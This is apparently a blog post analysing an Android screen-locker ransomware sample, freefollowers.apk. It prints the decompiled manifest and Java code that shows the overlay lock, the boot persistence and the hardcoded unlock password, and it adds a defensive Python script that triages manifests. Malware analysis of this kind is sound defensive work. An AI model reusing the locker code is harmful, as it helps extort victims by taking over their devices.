n0ps

Android Malware Analysis Series - freefollwers.apk

File Information: https://twitter.com/malwrhunterteam/status/1534958788096233472?s=20&t=OAEC5DdvJDvRp6SRsaaUaw

Sample Source: https://bazaar.abuse.ch/sample/5251a356421340a45c8dc6d431ef8a8cbca4078a0305a87f4fbd552e9fc0793e/#intel

SHA256 Hash: 5251a356421340a45c8dc6d431ef8a8cbca4078a0305a87f4fbd552e9fc0793e

Introduction

The freefollowers.apk appears to target people who use social media and want to increase the number of followers on their accounts, specifically Android users. I am not entirely sure of the delivery method this malware uses, but I found this sample APK via a Google search using the SHA256 hash. It appears that this piece of Android malware was posted by the MalwareHunterTeam Twitter account on June 9th of 2022. I have also found a variant on VirusTotal here; in the URL it identifies the malware as Android Locker.

This malware “screenlocks” the device by creating an overlay that instructs the user to send money to the address shown in the screenshot. Once the user has paid, the device can be unlocked with a password provided by the malware authors.

Decompilation and Analysis

Usually I start a security audit of an Android APK with a bit of automated analysis along with some manual review of the underlying APK structure, first getting an idea of what permissions, activities, and classes are declared in the manifest file and then moving on from there.

I deployed an Android emulated device specific to this test in Android Studio. The manifest file explicitly calls out Android API 23 (Marshmallow). I installed the malware via adb and then rebooted the emulated device to get the screenshot below.

As you can see, the actors behind this malware go by the group name XPhantom.

Manifest.xml file

Digging into freefollowers.apk, I observed one activity, one service, and one receiver in the Manifest.xml file. We can also see multiple permissions such as READ/WRITE_EXTERNAL_STORAGE, READ_CONTACTS, READ_SMS and RECEIVE_BOOT_COMPLETED. SYSTEM_ALERT_WINDOW is the permission that lets the app draw a view on top of other apps, which is what the overlay described below relies on.

<?xml version="1.0" encoding="utf-8"?>
<manifest xmlns:android="http://schemas.android.com/apk/res/android" android:versionCode="1" android:versionName="1.0" android:installLocation="internalOnly" android:compileSdkVersion="23" android:compileSdkVersionCodename="6.0-2438415" package="com.XPhantom.id" platformBuildVersionCode="23" platformBuildVersionName="6.0-2438415">
    <uses-sdk android:minSdkVersion="8" android:targetSdkVersion="21"/>
    <uses-permission android:name="android.permission.SYSTEM_ALERT_WINDOW"/>
    <uses-permission android:name="android.permission.RECEIVE_BOOT_COMPLETED"/>
    <uses-permission android:name="android.permission.SET_WALLPAPER"/>
    <uses-permission android:name="android.permission.READ_EXTERNAL_STORAGE"/>
    <uses-permission android:name="android.permission.WRITE_EXTERNAL_STORAGE"/>
    <uses-permission android:name="android.permission.READ_CONTACTS"/>
    <uses-permission android:name="android.permission.READ_SMS"/>
    <uses-permission android:name="android.permission.ACCESS_FINE_LOCATION"/>
    <uses-permission android:name="android.permission.WAKE_LOCK"/>
    <uses-permission android:name="android.permission.INTERNET"/>
    <uses-permission android:name="android.permission.REQUEST_INSTALL_PACKAGE"/>
    <uses-permission android:name="android.permission.CAMERA"/>
    <application android:theme="@style/AppTheme" android:label="@string/app_name" android:icon="@drawable/ic_launcher" android:debuggable="true">
        <activity android:label="@string/app_name" android:name="com.XPhantom.p000id.MainActivity">
            <intent-filter>
                <action android:name="android.intent.action.MAIN"/>
                <category android:name="android.intent.category.INFO"/>
            </intent-filter>
        </activity>
        <service android:name="com.XPhantom.p000id.MyService" android:enabled="true"/>
        <receiver android:name="com.XPhantom.p000id.BootReceiver" android:permission="android.permission.RECEIVE_BOOT_COMPLETED" android:enabled="true">
            <intent-filter>
                <action android:name="android.intent.action.BOOT_COMPLETED"/>
                <action android:name="android.intent.action.QUICKBOOT_POWERON"/>
                <category android:name="android.intent.category.DEFAULT"/>
            </intent-filter>
        </receiver>
    </application>
</manifest>
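As an added example (not part of the original post), the following Python script parses a decoded manifest like the one above and reports the indicators an analyst would triage first: the overlay permission, a BOOT_COMPLETED receiver, a debuggable build and the target SDK. The embedded manifest is an abridged copy constructed from the listing above.

```python
import xml.etree.ElementTree as ET

ANDROID_NS = "http://schemas.android.com/apk/res/android"

# Abridged copy of the sample's manifest, constructed from the listing above.
MANIFEST = """<?xml version="1.0" encoding="utf-8"?>
<manifest xmlns:android="http://schemas.android.com/apk/res/android" package="com.XPhantom.id">
    <uses-sdk android:minSdkVersion="8" android:targetSdkVersion="21"/>
    <uses-permission android:name="android.permission.SYSTEM_ALERT_WINDOW"/>
    <uses-permission android:name="android.permission.RECEIVE_BOOT_COMPLETED"/>
    <uses-permission android:name="android.permission.READ_SMS"/>
    <application android:debuggable="true">
        <service android:name="com.XPhantom.p000id.MyService"/>
        <receiver android:name="com.XPhantom.p000id.BootReceiver">
            <intent-filter>
                <action android:name="android.intent.action.BOOT_COMPLETED"/>
            </intent-filter>
        </receiver>
    </application>
</manifest>"""

BOOT_ACTION = "android.intent.action.BOOT_COMPLETED"

def attr(el, name):
    """Read an attribute from the android: namespace."""
    return el.get("{%s}%s" % (ANDROID_NS, name))

def triage_manifest(xml_text):
    """Return the locker-relevant indicators found in a decoded manifest."""
    root = ET.fromstring(xml_text)
    perms = {attr(p, "name") for p in root.iter("uses-permission")}
    app = root.find("application")
    sdk = root.find("uses-sdk")
    # Receivers that listen for BOOT_COMPLETED give the service persistence.
    boot_receivers = [
        attr(r, "name") for r in root.iter("receiver")
        if any(attr(a, "name") == BOOT_ACTION for a in r.iter("action"))
    ]
    findings = {
        "package": root.get("package"),
        "overlay_permission": "android.permission.SYSTEM_ALERT_WINDOW" in perms,
        "boot_receivers": boot_receivers,
        "services": [attr(s, "name") for s in root.iter("service")],
        "debuggable": app is not None and attr(app, "debuggable") == "true",
        # targetSdkVersion < 23 means the install-time permission model.
        "target_sdk": int(attr(sdk, "targetSdkVersion")) if sdk is not None else None,
    }
    # Overlay permission plus boot persistence is the screen-locker pattern.
    findings["locker_pattern"] = findings["overlay_permission"] and bool(boot_receivers)
    return findings
```

Run `triage_manifest(MANIFEST)` on the full decoded manifest of any sample to get the same dictionary of findings.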

MainActivity

In the MainActivity java code below we can see that the malware starts the service MyService.

package com.XPhantom.p000id;

import adrt.ADRTLogCatReader;
import android.app.Activity;
import android.content.Intent;
import android.os.Bundle;

/* renamed from: com.XPhantom.id.MainActivity */
/* loaded from: classes.dex */
public class MainActivity extends Activity {
    @Override // android.app.Activity
    public void onCreate(Bundle bundle) {
        ADRTLogCatReader.onContext(this, "com.aide.ui");
        super.onCreate(bundle);
        try {
            startService(new Intent(this, Class.forName("com.XPhantom.id.MyService")));
            finish();
        } catch (ClassNotFoundException e) {
            throw new NoClassDefFoundError(e.getMessage());
        }
    }
}

MyService class

After reviewing the classes bundled into this piece of malware, MyService appears to hold the main functionality, and it is started from MainActivity.

On line 23 of the MyService class there is a reference to LayoutInflater. In this sample it is used to inflate a View that is overlaid on the device, preventing the user from using their phone, and the overlay comes back even after a restart (the manifest registers a BootReceiver for BOOT_COMPLETED).

package com.XPhantom.p000id;

import adrt.ADRTLogCatReader;
import android.app.Service;
import android.content.Context;
import android.content.Intent;
import android.view.LayoutInflater;
import android.view.View;
import android.view.ViewGroup;
import android.view.WindowManager;
import android.widget.Button;
import android.widget.EditText;
import android.widget.ImageView;

/* renamed from: com.XPhantom.id.MyService */
public class MyService extends Service {
    ImageView chatHead;
    Context context;

    /* renamed from: e1 */
    EditText f0e1;
    ViewGroup myView;
    WindowManager windowManager;

    @Override // android.app.Service
    public void onCreate() {
        ADRTLogCatReader.onContext(this, "com.aide.ui");
        this.windowManager = (WindowManager) getSystemService("window");
        // Inflate the overlay layout (res/layout/main.xml) that will cover the screen.
        this.myView = (ViewGroup) ((LayoutInflater) getSystemService("layout_inflater")).inflate(C0000R.layout.main, (ViewGroup) null);
        this.chatHead = new ImageView(this);
        this.chatHead.setImageResource(C0000R.drawable.ic_launcher);
        // The EditText where the victim types the unlock code.
        this.f0e1 = (EditText) this.myView.findViewById(C0000R.C0001id.mainEditText1);
        ((Button) this.myView.findViewById(C0000R.C0001id.mainButton1)).setOnClickListener(new View.OnClickListener(this) { // from class: com.XPhantom.id.MyService.100000000
            private final MyService this$0;

https://developer.android.com/reference/android/view/LayoutInflater

Secondly, the developer reference linked above notes that LayoutInflater instantiates a View from an XML layout file, which in our case is defined by the malware author. If we take a look at the strings.xml file we can observe the same resources being applied to the LayoutInflater View via the C0000R class.

Thirdly, we can see in the following Java code snippet that the malware has a hardcoded string that allows the LayoutInflater overlay to be “removed”. Once this string, which appears to be the password, has been entered into the EditText read by getText(), the malware removes the overlay and the user can begin using the device again.

            @Override // android.view.View.OnClickListener
            public void onClick(View view) {
                // The unlock code is a hardcoded string compared against the EditText contents.
                if (this.this$0.f0e1.getText().toString().equals("Abdullah@")) {
                    // Remove the overlay from the window manager, then start the service again.
                    this.this$0.windowManager.removeView(this.this$0.myView);
                    try {
                        this.this$0.context.startService(new Intent(this.this$0.context, Class.forName("com.XPhantom.id.MyService")));
                        return;
                    } catch (ClassNotFoundException e) {
                        throw new NoClassDefFoundError(e.getMessage());
                    }
                }
            }
        });

Thanks for reading, and look out for future posts analyzing malware samples in 2023.